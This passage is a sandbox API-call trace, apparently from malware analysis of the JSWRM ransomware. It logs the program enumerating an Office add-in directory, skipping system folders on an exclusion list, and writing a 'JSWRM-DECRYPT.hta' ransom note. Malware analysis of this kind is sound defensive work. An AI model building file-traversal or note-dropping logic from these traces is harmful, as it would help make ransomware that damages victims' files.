cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.105] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.105] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.105] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.105] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.105] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.105] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.105] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.105] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.105] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.105] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0123.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0123.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0123.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0123.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0123.106] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf47e9c8f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf480feb5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.106] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.106] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.106] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.106] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.106] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.106] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.106] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.106] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.106] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.106] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0123.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0123.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0123.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0123.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244f90 [0123.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.107] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6bae279, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6bae279, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bae279, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0123.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0123.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0123.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0123.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x2450c8 [0123.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244f90 | out: hHeap=0x1e0000) returned 1 [0123.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.107] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c3d17b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4c3d17b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4c63313, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.107] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.108] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.108] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.108] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.108] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0123.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0123.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244be8 [0123.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2450c8 | out: hHeap=0x1e0000) returned 1 [0123.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.108] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x595a0ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x595a0ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59cc74e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x89040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.108] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.108] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.108] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.108] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.108] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.108] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.108] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.108] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.108] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.108] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0123.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0123.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0123.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0123.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0123.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244be8 | out: hHeap=0x1e0000) returned 1 [0123.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.109] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x595a0ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x595a0ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59cc74e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x89040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0123.109] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0123.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0123.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0123.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.110] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="fr", cAlternateFileName="")) returned 1 [0123.110] lstrcmpiW (lpString1="fr", lpString2=".") returned 1 [0123.110] lstrcmpiW (lpString1="fr", lpString2="..") returned 1 [0123.110] lstrcmpiW (lpString1="fr", lpString2="...") returned 1 [0123.110] lstrcmpiW (lpString1="fr", lpString2="windows") returned -1 [0123.110] lstrcmpiW (lpString1="fr", lpString2="recovery") returned -1 [0123.110] lstrcmpiW (lpString1="fr", lpString2="perflogs") returned -1 [0123.110] lstrcmpiW (lpString1="fr", lpString2="documents and settings") returned 1 [0123.110] lstrcmpiW (lpString1="fr", lpString2="$RECYCLE.BIN") returned 1 [0123.110] lstrcmpiW (lpString1="fr", lpString2="system volume information") returned -1 [0123.110] lstrcmpiW (lpString1="fr", lpString2="msocache") returned -1 [0123.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0123.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.110] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\fr\\jswrm-decrypt.hta")) returned 0xffffffff [0123.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0123.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0123.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\fr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.112] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.112] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.113] CloseHandle (hObject=0x338) returned 1 [0123.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0123.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0123.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0123.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\fr\\jswrm-decrypt.hta")) returned 0x20 [0123.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0123.113] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft 